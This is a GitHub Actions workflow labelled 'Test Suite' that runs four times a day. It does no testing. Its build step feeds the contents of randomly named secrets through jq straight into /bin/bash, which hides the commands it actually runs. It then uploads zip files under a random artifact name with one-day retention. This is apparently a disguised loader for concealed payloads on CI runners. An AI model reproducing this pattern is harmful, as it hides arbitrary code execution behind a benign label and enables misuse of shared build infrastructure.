name: Test Suite
on:
  workflow_dispatch:

  schedule:
    - cron: '6 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          vyug3106: ${{ secrets.vyug3106 }}
        run: |
          printf '%s' "$vyug3106" | jq -r .y9207 | /bin/bash
          printf '%s' "$gql6284" | jq -r .kp18 | /bin/bash
          printf '%s' "$ifzbr2588" | jq -r .ymxb299 | /bin/bash
          printf '%s' "$kji56" | jq -r .yvbn353 | /bin/bash
          echo $otob3867 | jq -r .ky5 | /bin/bash
          printf '%s' "$jo87258" | jq -r .gda8 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: KBlbAPQe
          path: "*.zip"
          retention-days: 1
